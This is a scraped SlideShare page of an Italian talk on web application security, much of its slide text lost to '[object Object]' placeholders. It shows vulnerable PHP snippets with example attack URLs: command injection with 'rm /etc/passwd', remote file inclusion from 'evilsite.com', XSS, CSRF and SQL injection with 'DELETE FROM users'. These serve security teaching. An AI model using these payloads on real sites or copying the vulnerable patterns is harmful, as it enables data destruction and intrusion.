SlideShare a Scribd company logo

Web Application Insecurity L D2007

J
jekil

Web Application Insecurity

Technology
1 of 22
Alessandro “jekil” Tanasi [email_address] http://www.tanasi.it Web Application (In)Security LUG Trieste
Introduzione.. Affermazioni illustri di manager, aziende, enti non citati. Ciao Gianni, sai ci siamo fatti fare il sito nuovo, abbiamo speso solo 500 ϵ ..no no, non esiste documentazione. Tanto è solo carta inutile! Ma certo che sono sicuro! Il sito è protetto da firewall e antivirus Anzi.. usiamo un ritrovato della sicurezza chiamato S..S.. SSL! Ci protegge lui, figo no? Ma alla fine, ti dirò, la sicurezza non ci interessa al momento ?
Siti e applicazioni web ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Un brutto giorno... ,[object Object],[object Object],[object Object],[object Object],[object Object]
Quali problemi? ,[object Object],[object Object],[object Object],[object Object],Mancanza di competenze degli sviluppatori, non comprensione dei problemi da parte del management, poca importanza data alla sicurezza. Indisponibilità a investire in cose che non danno un ritorno visibile.
Vulnerabilità comuni To win a war, one must know the way. Sun Tzu The Art of War
Utente, user input ,[object Object],[object Object],[object Object],[object Object],[object Object]
Code injection ,[object Object],[object Object],[object Object],http://example.com/index.php?arg=marmotta ,[object Object],[object Object],[object Object],[object Object],http://example.com/index.php?arg= marmotta; rm /etc/passwd
Remote file inclusion ,[object Object],[object Object],<?php include($layout); ?> http://example.com/index.php?layout=green http://example.com/index.php?layout=http://evilsite.com/evilscript
Cross site scripting(XSS) ,[object Object],[object Object],[object Object],<?php echo “You searched for $q”; // show results ?> http://example.com/index.php?q=marmotta http://example.com/index.php?q=<script>alert('buh!')</script>
XSS ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
CSRF ,[object Object],[object Object],[object Object],[object Object],<img src=&quot;http://google.com/search?q=porno&quot;/>
SQL Injection ,[object Object],[object Object],[object Object],[object Object],<?php mysql_query(“SELECT * FROM users WHERE uid='$var'”); ?> http://example.com/index.php?var=123 http://example.com/index.php?var=aaa'; DELETE FROM users;
Autenticazione debole ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Errori di gestione ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
OWASP Top 10 2007 ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],http://www.owasp.org
Ulteriori minacce ,[object Object],[object Object],[object Object]
Web Services ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Malware ,[object Object],[object Object],[object Object],[object Object],[object Object]
Altre vulnerabilità ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Conclusioni ,[object Object],[object Object],[object Object],[object Object],[object Object]
 

Recommended

Web Application Insecurity Uncensored
Web Application Insecurity UncensoredWeb Application Insecurity Uncensored
Web Application Insecurity Uncensoredjekil
 
Sicurezza delle applicazioni web
Sicurezza delle applicazioni webSicurezza delle applicazioni web
Sicurezza delle applicazioni webAdvenias
 
HTML5 Security
HTML5 SecurityHTML5 Security
HTML5 SecuritySimone Onofri
 
Hackers vs. Developers: HTML5 Security by Simone Onofri
Hackers vs. Developers: HTML5 Security by Simone OnofriHackers vs. Developers: HTML5 Security by Simone Onofri
Hackers vs. Developers: HTML5 Security by Simone OnofriCodemotion
 
19
1919
19Aline Melo
 
Parte leste dos
Parte leste dosParte leste dos
Parte leste dosVenécios Gonçalves
 
Resumen de la pelicula
Resumen de la peliculaResumen de la pelicula
Resumen de la peliculaperlamiguelreyes
 
America
AmericaAmerica
AmericaAnibal Enrique Atoc Rau
 

Recommended

Web Application Insecurity Uncensored
Web Application Insecurity UncensoredWeb Application Insecurity Uncensored
Web Application Insecurity Uncensoredjekil
 
Sicurezza delle applicazioni web
Sicurezza delle applicazioni webSicurezza delle applicazioni web
Sicurezza delle applicazioni webAdvenias
 
HTML5 Security
HTML5 SecurityHTML5 Security
HTML5 SecuritySimone Onofri
 
Hackers vs. Developers: HTML5 Security by Simone Onofri
Hackers vs. Developers: HTML5 Security by Simone OnofriHackers vs. Developers: HTML5 Security by Simone Onofri
Hackers vs. Developers: HTML5 Security by Simone OnofriCodemotion
 
19
1919
19Aline Melo
 
Parte leste dos
Parte leste dosParte leste dos
Parte leste dosVenécios Gonçalves
 
Resumen de la pelicula
Resumen de la peliculaResumen de la pelicula
Resumen de la peliculaperlamiguelreyes
 
America
AmericaAmerica
AmericaAnibal Enrique Atoc Rau
 
INTERNET Y LAS EMPRESAS AGROPECUARIAS
INTERNET Y LAS EMPRESAS AGROPECUARIASINTERNET Y LAS EMPRESAS AGROPECUARIAS
INTERNET Y LAS EMPRESAS AGROPECUARIASdanielaamestoy
 
V 70 prueba
V 70 pruebaV 70 prueba
V 70 pruebakeos1976
 
Digital ultrasonic cleaner with timer and temperature
Digital ultrasonic cleaner with timer and temperatureDigital ultrasonic cleaner with timer and temperature
Digital ultrasonic cleaner with timer and temperatureBeijing Quanxin Ultrasonic Co.,LTD
 
Jessy
JessyJessy
JessyJessy28
 
How to Choose Your Niche and Specialty
How to Choose Your Niche and SpecialtyHow to Choose Your Niche and Specialty
How to Choose Your Niche and SpecialtyShahab Anari, MD
 
Programação dia 08 de agosto
Programação dia 08 de agostoProgramação dia 08 de agosto
Programação dia 08 de agostoFabiano Drevek
 
Autoestima.pps
Autoestima.ppsAutoestima.pps
Autoestima.ppsraude44
 
Tutorial de photopeach
Tutorial de photopeachTutorial de photopeach
Tutorial de photopeachKarina Crespo- Ministerio de Educacion
 
Jasón y los Argonautas: comic
Jasón y los Argonautas: comic Jasón y los Argonautas: comic
Jasón y los Argonautas: comic Carlos Viloria
 
Sentido da existência humana
Sentido da existência humanaSentido da existência humana
Sentido da existência humanamluisavalente
 
Resumen De Contenidos II Semestre
Resumen De Contenidos II SemestreResumen De Contenidos II Semestre
Resumen De Contenidos II Semestrejorge vargas
 
impact of technology on Indian Retail Stores
impact of technology on Indian Retail Stores impact of technology on Indian Retail Stores
impact of technology on Indian Retail StoresRishabh Dogra
 
Sicurezza Informatica e Hacking - Università di Teramo 23/10/2015
Sicurezza Informatica e Hacking - Università di Teramo 23/10/2015Sicurezza Informatica e Hacking - Università di Teramo 23/10/2015
Sicurezza Informatica e Hacking - Università di Teramo 23/10/2015Pawel Zorzan Urban
 
Owasp parte3
Owasp parte3Owasp parte3
Owasp parte3claudiodigiovanni
 
Malware Analysis. A Case Study
Malware Analysis. A Case StudyMalware Analysis. A Case Study
Malware Analysis. A Case StudyGianni Amato
 
Bbshield
BbshieldBbshield
BbshieldGiorgio Fraiegari
 
EUERY Mongoose Web Security Scanner (ITA)
EUERY Mongoose Web Security Scanner (ITA)EUERY Mongoose Web Security Scanner (ITA)
EUERY Mongoose Web Security Scanner (ITA)Euery
 
Virtually Pwned: Hacking VMware [ITA - SMAU10]
Virtually Pwned: Hacking VMware [ITA - SMAU10]Virtually Pwned: Hacking VMware [ITA - SMAU10]
Virtually Pwned: Hacking VMware [ITA - SMAU10]Claudio Criscione
 
Sicurezza
SicurezzaSicurezza
SicurezzaPiera Ingala
 
Sicurezza Informatica Nelle Aziende Installfest2007
Sicurezza Informatica Nelle Aziende Installfest2007Sicurezza Informatica Nelle Aziende Installfest2007
Sicurezza Informatica Nelle Aziende Installfest2007jekil
 
HTML5, il lato client della forza...
HTML5, il lato client della forza... HTML5, il lato client della forza...
HTML5, il lato client della forza... Marco Vito Moscaritolo
 
La sicurezza delle Web Application - SMAU Business Bari 2013
La sicurezza delle Web Application - SMAU Business Bari 2013La sicurezza delle Web Application - SMAU Business Bari 2013
La sicurezza delle Web Application - SMAU Business Bari 2013Massimo Chirivì
 

More Related Content

Viewers also liked

INTERNET Y LAS EMPRESAS AGROPECUARIAS
INTERNET Y LAS EMPRESAS AGROPECUARIASINTERNET Y LAS EMPRESAS AGROPECUARIAS
INTERNET Y LAS EMPRESAS AGROPECUARIASdanielaamestoy
 
V 70 prueba
V 70 pruebaV 70 prueba
V 70 pruebakeos1976
 
How to Choose Your Niche and Specialty
How to Choose Your Niche and SpecialtyHow to Choose Your Niche and Specialty
How to Choose Your Niche and SpecialtyShahab Anari, MD
 
Programação dia 08 de agosto
Programação dia 08 de agostoProgramação dia 08 de agosto
Programação dia 08 de agostoFabiano Drevek
 
Autoestima.pps
Autoestima.ppsAutoestima.pps
Autoestima.ppsraude44
 
Jasón y los Argonautas: comic
Jasón y los Argonautas: comic Jasón y los Argonautas: comic
Jasón y los Argonautas: comic Carlos Viloria
 
Sentido da existência humana
Sentido da existência humanaSentido da existência humana
Sentido da existência humanamluisavalente
 
Resumen De Contenidos II Semestre
Resumen De Contenidos II SemestreResumen De Contenidos II Semestre
Resumen De Contenidos II Semestrejorge vargas
 
impact of technology on Indian Retail Stores
impact of technology on Indian Retail Stores impact of technology on Indian Retail Stores
impact of technology on Indian Retail StoresRishabh Dogra
 

Viewers also liked (12)

INTERNET Y LAS EMPRESAS AGROPECUARIAS
INTERNET Y LAS EMPRESAS AGROPECUARIASINTERNET Y LAS EMPRESAS AGROPECUARIAS
INTERNET Y LAS EMPRESAS AGROPECUARIAS
 
V 70 prueba
V 70 pruebaV 70 prueba
V 70 prueba
 
Digital ultrasonic cleaner with timer and temperature
Digital ultrasonic cleaner with timer and temperatureDigital ultrasonic cleaner with timer and temperature
Digital ultrasonic cleaner with timer and temperature
 
Jessy
JessyJessy
Jessy
 
How to Choose Your Niche and Specialty
How to Choose Your Niche and SpecialtyHow to Choose Your Niche and Specialty
How to Choose Your Niche and Specialty
 
Programação dia 08 de agosto
Programação dia 08 de agostoProgramação dia 08 de agosto
Programação dia 08 de agosto
 
Autoestima.pps
Autoestima.ppsAutoestima.pps
Autoestima.pps
 
Tutorial de photopeach
Tutorial de photopeachTutorial de photopeach
Tutorial de photopeach
 
Jasón y los Argonautas: comic
Jasón y los Argonautas: comic Jasón y los Argonautas: comic
Jasón y los Argonautas: comic
 
Sentido da existência humana
Sentido da existência humanaSentido da existência humana
Sentido da existência humana
 
Resumen De Contenidos II Semestre
Resumen De Contenidos II SemestreResumen De Contenidos II Semestre
Resumen De Contenidos II Semestre
 
impact of technology on Indian Retail Stores
impact of technology on Indian Retail Stores impact of technology on Indian Retail Stores
impact of technology on Indian Retail Stores
 

Similar to Web Application Insecurity L D2007

Sicurezza Informatica e Hacking - Università di Teramo 23/10/2015
Sicurezza Informatica e Hacking - Università di Teramo 23/10/2015Sicurezza Informatica e Hacking - Università di Teramo 23/10/2015
Sicurezza Informatica e Hacking - Università di Teramo 23/10/2015Pawel Zorzan Urban
 
Malware Analysis. A Case Study
Malware Analysis. A Case StudyMalware Analysis. A Case Study
Malware Analysis. A Case StudyGianni Amato
 
EUERY Mongoose Web Security Scanner (ITA)
EUERY Mongoose Web Security Scanner (ITA)EUERY Mongoose Web Security Scanner (ITA)
EUERY Mongoose Web Security Scanner (ITA)Euery
 
Virtually Pwned: Hacking VMware [ITA - SMAU10]
Virtually Pwned: Hacking VMware [ITA - SMAU10]Virtually Pwned: Hacking VMware [ITA - SMAU10]
Virtually Pwned: Hacking VMware [ITA - SMAU10]Claudio Criscione
 
Sicurezza Informatica Nelle Aziende Installfest2007
Sicurezza Informatica Nelle Aziende Installfest2007Sicurezza Informatica Nelle Aziende Installfest2007
Sicurezza Informatica Nelle Aziende Installfest2007jekil
 
La sicurezza delle Web Application - SMAU Business Bari 2013
La sicurezza delle Web Application - SMAU Business Bari 2013La sicurezza delle Web Application - SMAU Business Bari 2013
La sicurezza delle Web Application - SMAU Business Bari 2013Massimo Chirivì
 
Smau Bari 2013 Massimo Chirivì
Smau Bari 2013 Massimo ChirivìSmau Bari 2013 Massimo Chirivì
Smau Bari 2013 Massimo ChirivìSMAU
 
Conto corrente sotto attacco: come l’evoluzione dei Trojan Banker minacciano ...
Conto corrente sotto attacco: come l’evoluzione dei Trojan Banker minacciano ...Conto corrente sotto attacco: come l’evoluzione dei Trojan Banker minacciano ...
Conto corrente sotto attacco: come l’evoluzione dei Trojan Banker minacciano ...Gianfranco Tonello
 
WordCamp Bologna 2018 - Paolo Dolci
WordCamp Bologna 2018 - Paolo DolciWordCamp Bologna 2018 - Paolo Dolci
WordCamp Bologna 2018 - Paolo DolciWpSEO.it
 
Lezione 6 sicurezza sul web
Lezione 6 sicurezza sul webLezione 6 sicurezza sul web
Lezione 6 sicurezza sul webGeniusProgetto
 
The absolute need of Secure Http
The absolute need of Secure HttpThe absolute need of Secure Http
The absolute need of Secure HttpNicolò Carandini
 
Pentesting Android with BackBox 4
Pentesting Android with BackBox 4Pentesting Android with BackBox 4
Pentesting Android with BackBox 4raffaele_forte
 
Web Application Security: Bug Hunting e Code Review
Web Application Security: Bug Hunting e Code ReviewWeb Application Security: Bug Hunting e Code Review
Web Application Security: Bug Hunting e Code ReviewAntonio Parata
 
La complessità del malware: analisi strutturale ed ambienti di sviluppo
La complessità del malware: analisi strutturale ed ambienti di sviluppoLa complessità del malware: analisi strutturale ed ambienti di sviluppo
La complessità del malware: analisi strutturale ed ambienti di sviluppoMarco Ferrigno
 

Similar to Web Application Insecurity L D2007 (20)

Sicurezza Informatica e Hacking - Università di Teramo 23/10/2015
Sicurezza Informatica e Hacking - Università di Teramo 23/10/2015Sicurezza Informatica e Hacking - Università di Teramo 23/10/2015
Sicurezza Informatica e Hacking - Università di Teramo 23/10/2015
 
Owasp parte3
Owasp parte3Owasp parte3
Owasp parte3
 
Malware Analysis. A Case Study
Malware Analysis. A Case StudyMalware Analysis. A Case Study
Malware Analysis. A Case Study
 
Bbshield
BbshieldBbshield
Bbshield
 
EUERY Mongoose Web Security Scanner (ITA)
EUERY Mongoose Web Security Scanner (ITA)EUERY Mongoose Web Security Scanner (ITA)
EUERY Mongoose Web Security Scanner (ITA)
 
Virtually Pwned: Hacking VMware [ITA - SMAU10]
Virtually Pwned: Hacking VMware [ITA - SMAU10]Virtually Pwned: Hacking VMware [ITA - SMAU10]
Virtually Pwned: Hacking VMware [ITA - SMAU10]
 
Sicurezza
SicurezzaSicurezza
Sicurezza
 
Sicurezza Informatica Nelle Aziende Installfest2007
Sicurezza Informatica Nelle Aziende Installfest2007Sicurezza Informatica Nelle Aziende Installfest2007
Sicurezza Informatica Nelle Aziende Installfest2007
 
HTML5, il lato client della forza...
HTML5, il lato client della forza... HTML5, il lato client della forza...
HTML5, il lato client della forza...
 
La sicurezza delle Web Application - SMAU Business Bari 2013
La sicurezza delle Web Application - SMAU Business Bari 2013La sicurezza delle Web Application - SMAU Business Bari 2013
La sicurezza delle Web Application - SMAU Business Bari 2013
 
Smau Bari 2013 Massimo Chirivì
Smau Bari 2013 Massimo ChirivìSmau Bari 2013 Massimo Chirivì
Smau Bari 2013 Massimo Chirivì
 
Pericoli
PericoliPericoli
Pericoli
 
Conto corrente sotto attacco: come l’evoluzione dei Trojan Banker minacciano ...
Conto corrente sotto attacco: come l’evoluzione dei Trojan Banker minacciano ...Conto corrente sotto attacco: come l’evoluzione dei Trojan Banker minacciano ...
Conto corrente sotto attacco: come l’evoluzione dei Trojan Banker minacciano ...
 
WordCamp Bologna 2018 - Paolo Dolci
WordCamp Bologna 2018 - Paolo DolciWordCamp Bologna 2018 - Paolo Dolci
WordCamp Bologna 2018 - Paolo Dolci
 
Lezione 6 sicurezza sul web
Lezione 6 sicurezza sul webLezione 6 sicurezza sul web
Lezione 6 sicurezza sul web
 
The absolute need of Secure Http
The absolute need of Secure HttpThe absolute need of Secure Http
The absolute need of Secure Http
 
Pentesting Android with BackBox 4
Pentesting Android with BackBox 4Pentesting Android with BackBox 4
Pentesting Android with BackBox 4
 
Web Application Security: Bug Hunting e Code Review
Web Application Security: Bug Hunting e Code ReviewWeb Application Security: Bug Hunting e Code Review
Web Application Security: Bug Hunting e Code Review
 
La complessità del malware: analisi strutturale ed ambienti di sviluppo
La complessità del malware: analisi strutturale ed ambienti di sviluppoLa complessità del malware: analisi strutturale ed ambienti di sviluppo
La complessità del malware: analisi strutturale ed ambienti di sviluppo
 
Acciaio ...inux!
Acciaio ...inux!Acciaio ...inux!
Acciaio ...inux!
 

More from jekil

Names and virtual host discovery
Names and virtual host discoveryNames and virtual host discovery
Names and virtual host discoveryjekil
 
Cuckoo Sandbox: Automated malware analysis
Cuckoo Sandbox: Automated malware analysisCuckoo Sandbox: Automated malware analysis
Cuckoo Sandbox: Automated malware analysisjekil
 
Android Introduzione All Architettura Programmazione Sicurezza Serate A Tema ...
Android Introduzione All Architettura Programmazione Sicurezza Serate A Tema ...Android Introduzione All Architettura Programmazione Sicurezza Serate A Tema ...
Android Introduzione All Architettura Programmazione Sicurezza Serate A Tema ...jekil
 
Client Side Security Settordici Lugts
Client Side Security Settordici LugtsClient Side Security Settordici Lugts
Client Side Security Settordici Lugtsjekil
 
Android: Introduzione all'architettura, alla programmazione e alla sicurezza
Android: Introduzione all'architettura, alla programmazione e alla sicurezzaAndroid: Introduzione all'architettura, alla programmazione e alla sicurezza
Android: Introduzione all'architettura, alla programmazione e alla sicurezzajekil
 
Security by example
Security by exampleSecurity by example
Security by examplejekil
 
Sviluppo web con Ruby on Rails
Sviluppo web con Ruby on RailsSviluppo web con Ruby on Rails
Sviluppo web con Ruby on Railsjekil
 
XPath Injection
XPath InjectionXPath Injection
XPath Injectionjekil
 
Anonimato In Rete Summer Of Linux2007
Anonimato In Rete Summer Of Linux2007Anonimato In Rete Summer Of Linux2007
Anonimato In Rete Summer Of Linux2007jekil
 
Linux Nelle Aziende Summer Of Linux 2007
Linux Nelle Aziende Summer Of Linux 2007Linux Nelle Aziende Summer Of Linux 2007
Linux Nelle Aziende Summer Of Linux 2007jekil
 
Linux Nelle Aziende Installfest2007
Linux Nelle Aziende Installfest2007Linux Nelle Aziende Installfest2007
Linux Nelle Aziende Installfest2007jekil
 
Introduzione all'analisi forense
Introduzione all'analisi forenseIntroduzione all'analisi forense
Introduzione all'analisi forensejekil
 
MySQL
MySQLMySQL
MySQLjekil
 
MySQL 5
MySQL 5MySQL 5
MySQL 5jekil
 
Intrusion Detection Systems
Intrusion Detection SystemsIntrusion Detection Systems
Intrusion Detection Systemsjekil
 
La sicurezza informatica nello studio legale
La sicurezza informatica nello studio legaleLa sicurezza informatica nello studio legale
La sicurezza informatica nello studio legalejekil
 

More from jekil (16)

Names and virtual host discovery
Names and virtual host discoveryNames and virtual host discovery
Names and virtual host discovery
 
Cuckoo Sandbox: Automated malware analysis
Cuckoo Sandbox: Automated malware analysisCuckoo Sandbox: Automated malware analysis
Cuckoo Sandbox: Automated malware analysis
 
Android Introduzione All Architettura Programmazione Sicurezza Serate A Tema ...
Android Introduzione All Architettura Programmazione Sicurezza Serate A Tema ...Android Introduzione All Architettura Programmazione Sicurezza Serate A Tema ...
Android Introduzione All Architettura Programmazione Sicurezza Serate A Tema ...
 
Client Side Security Settordici Lugts
Client Side Security Settordici LugtsClient Side Security Settordici Lugts
Client Side Security Settordici Lugts
 
Android: Introduzione all'architettura, alla programmazione e alla sicurezza
Android: Introduzione all'architettura, alla programmazione e alla sicurezzaAndroid: Introduzione all'architettura, alla programmazione e alla sicurezza
Android: Introduzione all'architettura, alla programmazione e alla sicurezza
 
Security by example
Security by exampleSecurity by example
Security by example
 
Sviluppo web con Ruby on Rails
Sviluppo web con Ruby on RailsSviluppo web con Ruby on Rails
Sviluppo web con Ruby on Rails
 
XPath Injection
XPath InjectionXPath Injection
XPath Injection
 
Anonimato In Rete Summer Of Linux2007
Anonimato In Rete Summer Of Linux2007Anonimato In Rete Summer Of Linux2007
Anonimato In Rete Summer Of Linux2007
 
Linux Nelle Aziende Summer Of Linux 2007
Linux Nelle Aziende Summer Of Linux 2007Linux Nelle Aziende Summer Of Linux 2007
Linux Nelle Aziende Summer Of Linux 2007
 
Linux Nelle Aziende Installfest2007
Linux Nelle Aziende Installfest2007Linux Nelle Aziende Installfest2007
Linux Nelle Aziende Installfest2007
 
Introduzione all'analisi forense
Introduzione all'analisi forenseIntroduzione all'analisi forense
Introduzione all'analisi forense
 
MySQL
MySQLMySQL
MySQL
 
MySQL 5
MySQL 5MySQL 5
MySQL 5
 
Intrusion Detection Systems
Intrusion Detection SystemsIntrusion Detection Systems
Intrusion Detection Systems
 
La sicurezza informatica nello studio legale
La sicurezza informatica nello studio legaleLa sicurezza informatica nello studio legale
La sicurezza informatica nello studio legale
 

Web Application Insecurity L D2007

  • 1. Alessandro “jekil” Tanasi [email_address] http://www.tanasi.it Web Application (In)Security LUG Trieste
  • 2. Introduzione.. Affermazioni illustri di manager, aziende, enti non citati. Ciao Gianni, sai ci siamo fatti fare il sito nuovo, abbiamo speso solo 500 ϵ ..no no, non esiste documentazione. Tanto è solo carta inutile! Ma certo che sono sicuro! Il sito è protetto da firewall e antivirus Anzi.. usiamo un ritrovato della sicurezza chiamato S..S.. SSL! Ci protegge lui, figo no? Ma alla fine, ti dirò, la sicurezza non ci interessa al momento ?
  • 3.
  • 4.
  • 5.
  • 6. Vulnerabilità comuni To win a war, one must know the way. Sun Tzu The Art of War
  • 7.
  • 8.
  • 9.
  • 10.
  • 11.
  • 12.
  • 13.
  • 14.
  • 15.
  • 16.
  • 17.
  • 18.
  • 19.
  • 20.
  • 21.
  • 22.